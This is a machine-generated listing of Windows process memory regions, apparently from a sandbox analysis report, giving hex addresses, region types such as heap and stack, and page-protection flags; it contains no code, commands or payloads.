||
281ACB6F000
|
heap
|
page read and write
|
||
281ACA2F000
|
heap
|
page read and write
|
||
2224ED11000
|
trusted library allocation
|
page read and write
|
||
1B3F6A71000
|
heap
|
page read and write
|
||
1FCD633A000
|
heap
|
page read and write
|
||
157F000
|
stack
|
page read and write
|
||
2074DD74000
|
heap
|
page read and write
|
||
23BCC8CF000
|
heap
|
page read and write
|
||
7FFD9ABE0000
|
trusted library allocation
|
page read and write
|
||
281AC9AD000
|
heap
|
page read and write
|
||
281ACA20000
|
heap
|
page read and write
|
||
E7F000
|
stack
|
page read and write
|
||
1E880104000
|
heap
|
page read and write
|
||
23BCE99D000
|
heap
|
page read and write
|
||
1495000
|
heap
|
page read and write
|
||
281AC073000
|
heap
|
page read and write
|
||
2646A2B5000
|
heap
|
page read and write
|
||
215478B0000
|
heap
|
page read and write
|
||
281AC07E000
|
heap
|
page read and write
|
||
1DFEFCA9000
|
heap
|
page read and write
|
||
131A1000
|
trusted library allocation
|
page read and write
|
||
7FFE0EBF0000
|
unkown
|
page execute and read and write
|
||
281AC092000
|
heap
|
page read and write
|
||
26469B2A000
|
heap
|
page read and write
|
||
1B5DF000
|
stack
|
page read and write
|
||
174F19CE000
|
heap
|
page read and write
|
||
1C098A10000
|
heap
|
page read and write
|
||
281ACB6D000
|
heap
|
page read and write
|
||
1FCD618E000
|
heap
|
page read and write
|
||
174F1942000
|
heap
|
page read and write
|
||
1D0CCDD0000
|
heap
|
page read and write
|
||
1C829B70000
|
heap
|
page read and write
|
||
21B78FD0000
|
heap
|
page read and write
|
||
1C09922E000
|
heap
|
page read and write
|
||
7FFD9A7BD000
|
trusted library allocation
|
page execute and read and write
|
||
281ACA11000
|
heap
|
page read and write
|
||
281AC101000
|
heap
|
page read and write
|
||
281ACB65000
|
heap
|
page read and write
|
||
21B78F20000
|
heap
|
page read and write
|
||
26469ACF000
|
heap
|
page read and write
|
||
2BD1000
|
trusted library allocation
|
page read and write
|
||
1F23D3EC000
|
heap
|
page read and write
|
||
2646A13A000
|
heap
|
page read and write
|
||
1CA953A0000
|
heap
|
page read and write
|
||
1FCD6184000
|
heap
|
page read and write
|
||
7FFD9A8B0000
|
trusted library allocation
|
page execute and read and write
|
||
21B7ADEE000
|
heap
|
page read and write
|
||
174F1A2E000
|
trusted library allocation
|
page read and write
|
||
1DFEFBA0000
|
heap
|
page read and write
|
||
281AC9DC000
|
heap
|
page read and write
|
||
1F224E91000
|
trusted library allocation
|
page read and write
|
||
16CEEF7D000
|
heap
|
page read and write
|
||
23BCCB10000
|
heap
|
page read and write
|
||
1C099220000
|
heap
|
page read and write
|
||
281AC99D000
|
heap
|
page read and write
|
||
1E880000000
|
heap
|
page read and write
|
||
1B36E000
|
stack
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
ED8000
|
heap
|
page read and write
|
||
7FF71F136000
|
unkown
|
page read and write
|
||
2C30000
|
heap
|
page execute and read and write
|
||
22249750000
|
heap
|
page read and write
|
||
281AC8A0000
|
direct allocation
|
page read and write
|
||
1AF2D000
|
stack
|
page read and write
|
||
281ACFCB000
|
heap
|
page read and write
|
||
23BCC8D7000
|
heap
|
page read and write
|
||
281ABE48000
|
heap
|
page read and write
|
||
7FFD9AA5D000
|
trusted library allocation
|
page read and write
|
||
65A9DFF000
|
stack
|
page read and write
|
||
7FFD9A7C4000
|
trusted library allocation
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
7FFD9A850000
|
trusted library allocation
|
page read and write
|
||
19525FDD000
|
heap
|
page read and write
|
||
C20000
|
trusted library allocation
|
page read and write
|
||
174F1944000
|
heap
|
page read and write
|
||
2224A113000
|
heap
|
page read and write
|
||
281AC03D000
|
heap
|
page read and write
|
||
195247C6000
|
heap
|
page read and write
|
||
7FFDFB543000
|
unkown
|
page execute and read and write
|
||
281AC51C000
|
direct allocation
|
page read and write
|
||
50D2BFF000
|
unkown
|
page read and write
|
||
7FFE0EC11000
|
unkown
|
page execute and read and write
|
||
1FCD6327000
|
heap
|
page read and write
|
||
2C40AFF000
|
stack
|
page read and write
|
||
7FFD9A7D0000
|
trusted library allocation
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
13E1000
|
heap
|
page read and write
|
||
19522D6B000
|
heap
|
page read and write
|
||
23BCCB1A000
|
heap
|
page read and write
|
||
1DFEFDB0000
|
heap
|
page read and write
|
||
13C9000
|
heap
|
page read and write
|
||
281ABAE4000
|
heap
|
page read and write
|
||
17D13C51000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
21B78F6E000
|
heap
|
page read and write
|
||
2DDB4DF0000
|
heap
|
page read and write
|
||
1C09923C000
|
heap
|
page read and write
|
||
21B78FC8000
|
heap
|
page read and write
|
||
21B78EDD000
|
heap
|
page read and write
|
||
281ABA0F000
|
heap
|
page read and write
|
||
2262D9F0000
|
heap
|
page read and write
|
||
2646A2B2000
|
heap
|
page read and write
|
||
195259AF000
|
heap
|
page read and write
|
||
16CEEDF0000
|
heap
|
page read and write
|
||
281AC990000
|
heap
|
page read and write
|
||
281ABF4F000
|
heap
|
page read and write
|
||
7FFD9A9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A890000
|
trusted library allocation
|
page execute and read and write
|
||
3A0000
|
heap
|
page read and write
|
||
7375CF4000
|
stack
|
page read and write
|
||
1BFD045B000
|
heap
|
page read and write
|
||
7FF71F138000
|
unkown
|
page readonly
|
||
2262DA21000
|
heap
|
page read and write
|
||
2224EE62000
|
heap
|
page read and write
|
||
1DFEFC49000
|
heap
|
page read and write
|
||
281AC9D1000
|
heap
|
page read and write
|
||
7FF71F090000
|
unkown
|
page readonly
|
||
21B794EF000
|
heap
|
page read and write
|
||
16CEEEFB000
|
heap
|
page read and write
|
||
174F1A64000
|
trusted library allocation
|
page read and write
|
||
281ABAE4000
|
heap
|
page read and write
|
||
281ACBF5000
|
heap
|
page read and write
|
||
1C09922E000
|
heap
|
page read and write
|
||
2646A29F000
|
heap
|
page read and write
|
||
281ABEC3000
|
heap
|
page read and write
|
||
7FFD9A856000
|
trusted library allocation
|
page read and write
|
||
281AC8A0000
|
direct allocation
|
page read and write
|
||
1C098C57000
|
heap
|
page read and write
|
||
246303E4000
|
trusted library allocation
|
page read and write
|
||
281AB95E000
|
heap
|
page read and write
|
||
C2F178F000
|
stack
|
page read and write
|
||
1DFF2FF0000
|
direct allocation
|
page read and write
|
||
227EEE10000
|
heap
|
page read and write
|
||
1BECE000
|
heap
|
page read and write
|
||
23671126000
|
heap
|
page read and write
|
||
7FFE0EC64000
|
unkown
|
page execute and read and write
|
||
1E8FFE4B000
|
heap
|
page read and write
|
||
281ABF60000
|
heap
|
page read and write
|
||
281ABF24000
|
heap
|
page read and write
|
||
1C09920E000
|
heap
|
page read and write
|
||
281AC9D5000
|
heap
|
page read and write
|
||
7FFD9AB20000
|
trusted library allocation
|
page read and write
|
||
281AC04F000
|
heap
|
page read and write
|
||
264FC1CB000
|
heap
|
page read and write
|
||
127D000
|
heap
|
page read and write
|
||
281ACB37000
|
heap
|
page read and write
|
||
23BCE991000
|
heap
|
page read and write
|
||
174F1A29000
|
trusted library allocation
|
page read and write
|
||
6E51BDF000
|
unkown
|
page read and write
|
||
1CE5D000
|
stack
|
page read and write
|
||
23BCE99E000
|
heap
|
page read and write
|
||
281AC07D000
|
heap
|
page read and write
|
||
281AC03E000
|
heap
|
page read and write
|
||
281ABF04000
|
heap
|
page read and write
|
||
281ABB0A000
|
heap
|
page read and write
|
||
7FFE148BC000
|
unkown
|
page read and write
|
||
7FF71F124000
|
unkown
|
page read and write
|
||
281ACBAE000
|
heap
|
page read and write
|
||
281ACB6C000
|
heap
|
page read and write
|
||
281AB6D6000
|
heap
|
page read and write
|
||
1FCD6184000
|
heap
|
page read and write
|
||
15E849D0000
|
heap
|
page read and write
|
||
174F1A62000
|
trusted library allocation
|
page read and write
|
||
281AC03D000
|
heap
|
page read and write
|
||
7FFD9A7A4000
|
trusted library allocation
|
page read and write
|
||
2A04CEF0000
|
heap
|
page read and write
|
||
1FCD633D000
|
heap
|
page read and write
|
||
1FCD61D3000
|
heap
|
page read and write
|
||
84DB4FE000
|
stack
|
page read and write
|
||
2E4F000
|
trusted library allocation
|
page read and write
|
||
281AB6C2000
|
heap
|
page read and write
|
||
281ADB40000
|
direct allocation
|
page read and write
|
||
7FFDFF252000
|
unkown
|
page execute and read and write
|
||
1C098C56000
|
heap
|
page read and write
|
||
7FFDF85B2000
|
unkown
|
page execute and read and write
|
||
29E031F0000
|
heap
|
page read and write
|
||
16CEEF52000
|
heap
|
page read and write
|
||
281AC991000
|
heap
|
page read and write
|
||
174F0EFB000
|
trusted library allocation
|
page read and write
|
||
1DFEFC6C000
|
heap
|
page read and write
|
||
21B78FCA000
|
heap
|
page read and write
|
||
281ACEC0000
|
heap
|
page read and write
|
||
281ABF4F000
|
heap
|
page read and write
|
||
16CEF079000
|
heap
|
page read and write
|
||
174F199E000
|
heap
|
page read and write
|
||
2A75F530000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
22249813000
|
heap
|
page read and write
|
||
281AB65D000
|
heap
|
page read and write
|
||
70EA53B000
|
stack
|
page read and write
|
||
1E835A31000
|
heap
|
page read and write
|
||
1DFEFC46000
|
heap
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
281ACD3F000
|
heap
|
page read and write
|
||
281AC0A4000
|
heap
|
page read and write
|
||
21B78FB4000
|
heap
|
page read and write
|
||
281ACFCB000
|
heap
|
page read and write
|
||
2224F008000
|
trusted library allocation
|
page read and write
|
||
25F37A11000
|
heap
|
page read and write
|
||
2684AF2B000
|
heap
|
page read and write
|
||
1F23D1D6000
|
heap
|
page read and write
|
||
23BCC93E000
|
heap
|
page read and write
|
||
23BCCB17000
|
heap
|
page read and write
|
||
7FFD9A942000
|
trusted library allocation
|
page read and write
|
||
281AC9D1000
|
heap
|
page read and write
|
||
1240000
|
heap
|
page read and write
|
||
281AD190000
|
direct allocation
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
2A04CEE0000
|
heap
|
page read and write
|
||
281AC118000
|
heap
|
page read and write
|
||
2224EEC1000
|
heap
|
page read and write
|
||
281AC9DC000
|
heap
|
page read and write
|
||
2462EF5F000
|
trusted library allocation
|
page read and write
|
||
1DFEFC2B000
|
heap
|
page read and write
|
||
174F199E000
|
heap
|
page read and write
|
||
7375CE2000
|
stack
|
page read and write
|
||
281ACA20000
|
heap
|
page read and write
|
||
1C099217000
|
heap
|
page read and write
|
||
2B319FF000
|
stack
|
page read and write
|
||
7FFD9ABF0000
|
trusted library allocation
|
page read and write
|
||
23BCC925000
|
heap
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
19522D80000
|
heap
|
page read and write
|
||
BFA90FB000
|
stack
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
281AC09E000
|
heap
|
page read and write
|
||
21B78FA5000
|
heap
|
page read and write
|
||
19525FF5000
|
heap
|
page read and write
|
||
16CEEF16000
|
heap
|
page read and write
|
||
125D2000
|
trusted library allocation
|
page read and write
|
||
7FFD9A994000
|
trusted library allocation
|
page read and write
|
||
70E9B43000
|
stack
|
page read and write
|
||
1D373A90000
|
heap
|
page read and write
|
||
174F199B000
|
heap
|
page read and write
|
||
23671133000
|
heap
|
page read and write
|
||
174F6252000
|
trusted library allocation
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
7FFD9AA30000
|
trusted library allocation
|
page read and write
|
||
174F199B000
|
heap
|
page read and write
|
||
2538CB54000
|
heap
|
page read and write
|
||
1A94B000
|
heap
|
page read and write
|
||
2367112B000
|
heap
|
page read and write
|
||
1CC34E61000
|
heap
|
page read and write
|
||
1DFF30F0000
|
direct allocation
|
page read and write
|
||
2E4C000
|
trusted library allocation
|
page read and write
|
||
15E848D0000
|
heap
|
page read and write
|
||
281AB9CC000
|
heap
|
page read and write
|
||
70EA43E000
|
stack
|
page read and write
|
||
77D000
|
heap
|
page read and write
|
||
2462F9A3000
|
trusted library allocation
|
page read and write
|
||
16CEEF23000
|
heap
|
page read and write
|
||
1DFEFC0E000
|
heap
|
page read and write
|
||
1EC76621000
|
heap
|
page read and write
|
||
227EEDF0000
|
heap
|
page read and write
|
||
281AC994000
|
heap
|
page read and write
|
||
1340000
|
heap
|
page read and write
|
||
281AB9D6000
|
heap
|
page read and write
|
||
195247C6000
|
heap
|
page read and write
|
||
26469B25000
|
heap
|
page read and write
|
||
1FCD8162000
|
heap
|
page read and write
|
||
23671102000
|
heap
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
174F19A5000
|
heap
|
page read and write
|
||
F20C9AC000
|
stack
|
page read and write
|
||
1C098C54000
|
heap
|
page read and write
|
||
281AD1F0000
|
direct allocation
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
281ABF4F000
|
heap
|
page read and write
|
||
1DFEFC0D000
|
heap
|
page read and write
|
||
174F0F02000
|
trusted library allocation
|
page read and write
|
||
26469AFC000
|
heap
|
page read and write
|
||
23699F20000
|
heap
|
page read and write
|
||
2155A7CD000
|
heap
|
page read and write
|
||
7DF4C1470000
|
trusted library allocation
|
page execute and read and write
|
||
7FFDFA9C8000
|
unkown
|
page execute and read and write
|
||
7FFD9A8B6000
|
trusted library allocation
|
page execute and read and write
|
||
281AC998000
|
heap
|
page read and write
|
||
281AD320000
|
heap
|
page read and write
|
||
1EC76600000
|
heap
|
page read and write
|
||
EC461FF000
|
stack
|
page read and write
|
||
1B8AC2A1000
|
heap
|
page read and write
|
||
F20000
|
heap
|
page read and write
|
||
F9A000
|
heap
|
page read and write
|
||
C80000
|
heap
|
page read and write
|
||
281ABF5C000
|
heap
|
page read and write
|
||
281ACB6F000
|
heap
|
page read and write
|
||
1C09921C000
|
heap
|
page read and write
|
||
2646A28C000
|
heap
|
page read and write
|
||
281AC101000
|
heap
|
page read and write
|
||
174F1120000
|
trusted library allocation
|
page read and write
|
||
281AC980000
|
direct allocation
|
page read and write
|
||
1BA6E000
|
stack
|
page read and write
|
||
2C409FF000
|
unkown
|
page read and write
|
||
281AC0BC000
|
heap
|
page read and write
|
||
23671030000
|
heap
|
page read and write
|
||
281AB62C000
|
heap
|
page read and write
|
||
7FFD9A7AD000
|
trusted library allocation
|
page execute and read and write
|
||
24646FA0000
|
heap
|
page read and write
|
||
281ABA1B000
|
heap
|
page read and write
|
||
281ABA0C000
|
heap
|
page read and write
|
||
FE7547F000
|
stack
|
page read and write
|
||
195246D4000
|
heap
|
page read and write
|
||
2224ECF0000
|
trusted library allocation
|
page read and write
|
||
281ABF52000
|
heap
|
page read and write
|
||
211E2F7A000
|
heap
|
page read and write
|
||
7FFD9AAD0000
|
trusted library allocation
|
page read and write
|
||
1C098C57000
|
heap
|
page read and write
|
||
FA9000
|
heap
|
page read and write
|
||
1F224D90000
|
heap
|
page readonly
|
||
281AC330000
|
direct allocation
|
page read and write
|
||
1DFEFC01000
|
heap
|
page read and write
|
||
1D372110000
|
heap
|
page read and write
|
||
281AC11B000
|
heap
|
page read and write
|
||
16CEEEDE000
|
heap
|
page read and write
|
||
7FF71F13E000
|
unkown
|
page readonly
|
||
2A04D2F0000
|
heap
|
page read and write
|
||
174F1928000
|
heap
|
page read and write
|
||
21B78F68000
|
heap
|
page read and write
|
||
1DFEFAA0000
|
heap
|
page read and write
|
||
281ACEC1000
|
heap
|
page read and write
|
||
7FFE130CC000
|
unkown
|
page read and write
|
||
222498FF000
|
heap
|
page read and write
|
||
CE8000
|
heap
|
page read and write
|
||
1DA818A1000
|
heap
|
page read and write
|
||
1FCD614D000
|
heap
|
page read and write
|
||
2224EEED000
|
heap
|
page read and write
|
||
23BCE99E000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
281AC9C0000
|
heap
|
page read and write
|
||
280FB3C000
|
stack
|
page read and write
|
||
7FF64489B000
|
unkown
|
page readonly
|
||
1FCD8174000
|
heap
|
page read and write
|
||
1FCD6080000
|
trusted library allocation
|
page read and write
|
||
16CEEF63000
|
heap
|
page read and write
|
||
1D6BCF50000
|
heap
|
page read and write
|
||
264FC1F4000
|
heap
|
page read and write
|
||
FD9000
|
heap
|
page read and write
|
||
281AB6AF000
|
heap
|
page read and write
|
||
26469A95000
|
heap
|
page read and write
|
||
7FFE11EE2000
|
unkown
|
page execute and write copy
|
||
23BCC921000
|
heap
|
page read and write
|
||
1100000
|
heap
|
page read and write
|
||
281ACB37000
|
heap
|
page read and write
|
||
1EC76621000
|
heap
|
page read and write
|
||
CA8000
|
heap
|
page read and write
|
||
2E51000
|
trusted library allocation
|
page read and write
|
||
7FFD9A8A6000
|
trusted library allocation
|
page execute and read and write
|
||
281ACBEB000
|
heap
|
page read and write
|
||
24647170000
|
heap
|
page read and write
|
||
281ABF48000
|
heap
|
page read and write
|
||
1DFF3110000
|
direct allocation
|
page read and write
|
||
281AB633000
|
heap
|
page read and write
|
||
2224F018000
|
trusted library allocation
|
page read and write
|
||
26469A89000
|
heap
|
page read and write
|
||
16CF0B0D000
|
heap
|
page read and write
|
||
281ABAAD000
|
heap
|
page read and write
|
||
281ABA70000
|
heap
|
page read and write
|
||
1FCD6177000
|
heap
|
page read and write
|
||
16CEEEDD000
|
heap
|
page read and write
|
||
7FFE0EC31000
|
unkown
|
page execute and write copy
|
||
1FCD6080000
|
trusted library allocation
|
page read and write
|
||
1FCD67F5000
|
heap
|
page read and write
|
||
281AC037000
|
heap
|
page read and write
|
||
281ACBF5000
|
heap
|
page read and write
|
||
1BECC000
|
heap
|
page read and write
|
||
264FC100000
|
heap
|
page read and write
|
||
70EA0FE000
|
stack
|
page read and write
|
||
14CC0915000
|
heap
|
page read and write
|
||
24647053000
|
heap
|
page read and write
|
||
24630217000
|
trusted library allocation
|
page read and write
|
||
1DFF30B0000
|
direct allocation
|
page read and write
|
||
7FFDFAE86000
|
unkown
|
page execute and read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
2A75F970000
|
heap
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
281AC11E000
|
heap
|
page read and write
|
||
281ABF24000
|
heap
|
page read and write
|
||
2367112E000
|
heap
|
page read and write
|
||
1DFEFC25000
|
heap
|
page read and write
|
||
211E3180000
|
heap
|
page read and write
|
||
CA5000
|
heap
|
page read and write
|
||
281AC0C6000
|
heap
|
page read and write
|
||
2F7F68B000
|
stack
|
page read and write
|
||
1DFEFDB4000
|
heap
|
page read and write
|
||
21B78FBB000
|
heap
|
page read and write
|
||
23F4758B000
|
heap
|
page read and write
|
||
1A75000
|
heap
|
page read and write
|
||
299E000
|
stack
|
page read and write
|
||
281ABF5C000
|
heap
|
page read and write
|
||
2262DA32000
|
heap
|
page read and write
|
||
281AB5FF000
|
heap
|
page read and write
|
||
174F199C000
|
heap
|
page read and write
|
||
1F23D2A0000
|
heap
|
page execute and read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
12A5E0CC000
|
heap
|
page read and write
|
||
21B78FD6000
|
heap
|
page read and write
|
||
16CEEF24000
|
heap
|
page read and write
|
||
281ABF13000
|
heap
|
page read and write
|
||
26469A57000
|
heap
|
page read and write
|
||
1B3F6A50000
|
heap
|
page read and write
|
||
26469B1C000
|
heap
|
page read and write
|
||
23BCE993000
|
heap
|
page read and write
|
||
1F224E80000
|
heap
|
page read and write
|
||
7FFD9A896000
|
trusted library allocation
|
page execute and read and write
|
||
1CA952AB000
|
heap
|
page read and write
|
||
1C829E00000
|
heap
|
page read and write
|
||
23BCD02D000
|
heap
|
page read and write
|
||
1369000
|
heap
|
page read and write
|
||
2074DB10000
|
heap
|
page read and write
|
||
2224985B000
|
heap
|
page read and write
|
||
281AD5C0000
|
direct allocation
|
page read and write
|
||
1C099239000
|
heap
|
page read and write
|
||
281ACD9D000
|
heap
|
page read and write
|
||
281ABF39000
|
heap
|
page read and write
|
||
1DFF3166000
|
direct allocation
|
page read and write
|
||
24630323000
|
trusted library allocation
|
page read and write
|
||
2BDC000
|
trusted library allocation
|
page read and write
|
||
174F0EFE000
|
trusted library allocation
|
page read and write
|
||
281ABE15000
|
heap
|
page read and write
|
||
2B318FF000
|
unkown
|
page read and write
|
||
1B3F69A0000
|
heap
|
page read and write
|
||
19525FBD000
|
heap
|
page read and write
|
||
26469CFE000
|
heap
|
page read and write
|
||
21B78F72000
|
heap
|
page read and write
|
||
76651FF000
|
stack
|
page read and write
|
||
2224EF00000
|
heap
|
page read and write
|
||
281ACD43000
|
heap
|
page read and write
|
||
7FFDFAEA0000
|
unkown
|
page read and write
|
||
1F224A10000
|
trusted library allocation
|
page read and write
|
||
281AC9E1000
|
heap
|
page read and write
|
||
281AC970000
|
direct allocation
|
page read and write
|
||
25F377FD000
|
heap
|
page read and write
|
||
281AC069000
|
heap
|
page read and write
|
||
1C099202000
|
heap
|
page read and write
|
||
281AC9AD000
|
heap
|
page read and write
|
||
7FFE148B1000
|
unkown
|
page execute and read and write
|
||
25F377B0000
|
heap
|
page read and write
|
||
281AB95F000
|
heap
|
page read and write
|
||
1DFF2FD0000
|
direct allocation
|
page read and write
|
||
281AB6BF000
|
heap
|
page read and write
|
||
21B78FDE000
|
heap
|
page read and write
|
||
281AC9AB000
|
heap
|
page read and write
|
||
16CEEF16000
|
heap
|
page read and write
|
||
281AC066000
|
heap
|
page read and write
|
||
2074DD80000
|
heap
|
page read and write
|
||
9AB1AFF000
|
stack
|
page read and write
|
||
2A1302A0000
|
heap
|
page read and write
|
||
16CEEF27000
|
heap
|
page read and write
|
||
21B78FB4000
|
heap
|
page read and write
|
||
E1D59FF000
|
stack
|
page read and write
|
||
160026E1000
|
heap
|
page read and write
|
||
2DDB4EB5000
|
heap
|
page read and write
|
||
281AB9EB000
|
heap
|
page read and write
|
||
9E05EFF000
|
unkown
|
page read and write
|
||
19525F9F000
|
heap
|
page read and write
|
||
2646BB22000
|
heap
|
page read and write
|
||
281A9CCA000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
2E20000
|
heap
|
page execute and read and write
|
||
174F0EFB000
|
trusted library allocation
|
page read and write
|
||
281AC9C4000
|
heap
|
page read and write
|
||
281AB6D6000
|
heap
|
page read and write
|
||
7FFE148B9000
|
unkown
|
page execute and read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
1B72D000
|
stack
|
page read and write
|
||
1C829B90000
|
heap
|
page read and write
|
||
7FFDFF191000
|
unkown
|
page execute and read and write
|
||
174F199D000
|
heap
|
page read and write
|
||
19525FFD000
|
heap
|
page read and write
|
||
174F1A60000
|
heap
|
page read and write
|
||
1B8AC299000
|
heap
|
page read and write
|
||
7FFD9A8C0000
|
trusted library allocation
|
page execute and read and write
|
||
113C000
|
heap
|
page read and write
|
||
7FFD9AA70000
|
trusted library allocation
|
page read and write
|
||
281AC9CA000
|
heap
|
page read and write
|
||
281AC0BE000
|
heap
|
page read and write
|
||
19525FF5000
|
heap
|
page read and write
|
||
2224F056000
|
trusted library allocation
|
page read and write
|
||
7FFD9A980000
|
trusted library allocation
|
page execute and read and write
|
||
281AB4E0000
|
direct allocation
|
page read and write
|
||
7FFD9A7E4000
|
trusted library allocation
|
page read and write
|
||
1DC5D080000
|
heap
|
page read and write
|
||
2DDB4EDB000
|
heap
|
page read and write
|
||
EF9000
|
heap
|
page read and write
|
||
281ABF5C000
|
heap
|
page read and write
|
||
26469AA5000
|
heap
|
page read and write
|
||
281ABE41000
|
heap
|
page read and write
|
||
281AC04F000
|
heap
|
page read and write
|
||
19524FB9000
|
heap
|
page read and write
|
||
6284CFF000
|
unkown
|
page read and write
|
||
23BCC8C0000
|
heap
|
page read and write
|
||
19525F28000
|
heap
|
page read and write
|
||
16CEEF58000
|
heap
|
page read and write
|
||
174F19CE000
|
heap
|
page read and write
|
||
7FFE14646000
|
unkown
|
page execute and read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
281AC098000
|
heap
|
page read and write
|
||
21B794E8000
|
heap
|
page read and write
|
||
21B78FD9000
|
heap
|
page read and write
|
||
281ACD47000
|
heap
|
page read and write
|
||
281AB675000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
281AB66A000
|
heap
|
page read and write
|
||
2463EAB1000
|
trusted library allocation
|
page read and write
|
||
19522D6B000
|
heap
|
page read and write
|
||
22249874000
|
heap
|
page read and write
|
||
281ABA66000
|
heap
|
page read and write
|
||
CE76DBC000
|
stack
|
page read and write
|
||
211E2F91000
|
heap
|
page read and write
|
||
7FFD9A932000
|
trusted library allocation
|
page read and write
|
||
7FFD9A896000
|
trusted library allocation
|
page execute and read and write
|
||
281AC8E0000
|
direct allocation
|
page read and write
|
||
7FFD9A7A1000
|
trusted library allocation
|
page read and write
|
||
1C09AB8D000
|
heap
|
page read and write
|
||
13068000
|
trusted library allocation
|
page read and write
|
||
23671132000
|
heap
|
page read and write
|
||
264FC1F1000
|
heap
|
page read and write
|
||
2262D870000
|
heap
|
page read and write
|
||
F00000
|
heap
|
page read and write
|
||
19525FC3000
|
heap
|
page read and write
|
||
3071000
|
trusted library allocation
|
page read and write
|
||
281ABA5E000
|
heap
|
page read and write
|
||
281AC508000
|
direct allocation
|
page read and write
|
||
16CEEF6B000
|
heap
|
page read and write
|
||
1D0CD010000
|
heap
|
page read and write
|
||
281AC9A5000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
1D6BD017000
|
heap
|
page read and write
|
||
2A75F5E1000
|
heap
|
page read and write
|
||
BA03177000
|
stack
|
page read and write
|
||
7D3000
|
heap
|
page read and write
|
||
16CF0AE0000
|
heap
|
page read and write
|
||
7FFE13211000
|
unkown
|
page execute and read and write
|
||
2224EEC8000
|
heap
|
page read and write
|
||
1E835BE0000
|
heap
|
page read and write
|
||
1FCD6199000
|
heap
|
page read and write
|
||
23BCC915000
|
heap
|
page read and write
|
||
B0FD7EF000
|
stack
|
page read and write
|
||
281AB604000
|
heap
|
page read and write
|
||
2646BB34000
|
heap
|
page read and write
|
||
B3A9E7E000
|
stack
|
page read and write
|
||
281AC8C0000
|
direct allocation
|
page read and write
|
||
1B134000
|
heap
|
page read and write
|
||
281AB6BF000
|
heap
|
page read and write
|
||
2A04D120000
|
heap
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
23BCD031000
|
heap
|
page read and write
|
||
7FFDF85FE000
|
unkown
|
page execute and read and write
|
||
281ABE41000
|
heap
|
page read and write
|
||
281ABE5F000
|
heap
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
1FCD67EC000
|
heap
|
page read and write
|
||
16CEEF72000
|
heap
|
page read and write
|
||
19522CF3000
|
heap
|
page read and write
|
||
7FF644871000
|
unkown
|
page execute read
|
||
281AC033000
|
heap
|
page read and write
|
||
24646FB0000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
BA030FF000
|
stack
|
page read and write
|
||
264FC1F5000
|
heap
|
page read and write
|
||
16CEEEEB000
|
heap
|
page read and write
|
||
281ABE6A000
|
heap
|
page read and write
|
||
2DDB4EDB000
|
heap
|
page read and write
|
||
1C099204000
|
heap
|
page read and write
|
||
1FCD61A3000
|
heap
|
page read and write
|
||
264699E0000
|
heap
|
page read and write
|
||
281AC8D0000
|
direct allocation
|
page read and write
|
||
281AC120000
|
direct allocation
|
page read and write
|
||
21B79509000
|
heap
|
page read and write
|
||
281ACB4B000
|
heap
|
page read and write
|
||
21B78FA2000
|
heap
|
page read and write
|
||
1F23D1E2000
|
heap
|
page read and write
|
||
15E84B04000
|
heap
|
page read and write
|
||
2646A2AF000
|
heap
|
page read and write
|
||
16CEEF6B000
|
heap
|
page read and write
|
||
2224F06F000
|
trusted library allocation
|
page read and write
|
||
21B78FD2000
|
heap
|
page read and write
|
||
1C09AB83000
|
heap
|
page read and write
|
||
281ABD20000
|
heap
|
page read and write
|
||
19525F88000
|
heap
|
page read and write
|
||
281ACA01000
|
heap
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
281ABF13000
|
heap
|
page read and write
|
||
2462D110000
|
heap
|
page read and write
|
||
281AC524000
|
direct allocation
|
page read and write
|
||
1FCD61CA000
|
heap
|
page read and write
|
||
19525FDE000
|
heap
|
page read and write
|
||
1330000
|
heap
|
page read and write
|
||
21B78F50000
|
heap
|
page read and write
|
||
281AB647000
|
heap
|
page read and write
|
||
22249780000
|
trusted library allocation
|
page read and write
|
||
16CEEF74000
|
heap
|
page read and write
|
||
281AC9C2000
|
heap
|
page read and write
|
||
174F1932000
|
heap
|
page read and write
|
||
26469CFD000
|
heap
|
page read and write
|
||
195257AF000
|
heap
|
page read and write
|
||
2646A294000
|
heap
|
page read and write
|
||
26469B38000
|
heap
|
page read and write
|
||
1FCD8161000
|
heap
|
page read and write
|
||
16CEEF33000
|
heap
|
page read and write
|
||
16CEEF76000
|
heap
|
page read and write
|
||
76650FF000
|
stack
|
page read and write
|
||
13F1000
|
heap
|
page read and write
|
||
19525FF6000
|
heap
|
page read and write
|
||
16CEEF6E000
|
heap
|
page read and write
|
||
281AC9CA000
|
heap
|
page read and write
|
||
281ACD7C000
|
heap
|
page read and write
|
||
281AB969000
|
heap
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
115A000
|
heap
|
page read and write
|
||
281AB6D8000
|
heap
|
page read and write
|
||
281AB963000
|
heap
|
page read and write
|
||
281ABA40000
|
heap
|
page read and write
|
||
23F8ADB4000
|
heap
|
page read and write
|
||
25F379F0000
|
heap
|
page read and write
|
||
1C50E000
|
stack
|
page read and write
|
||
2462EA17000
|
heap
|
page execute and read and write
|
||
227EEE10000
|
heap
|
page read and write
|
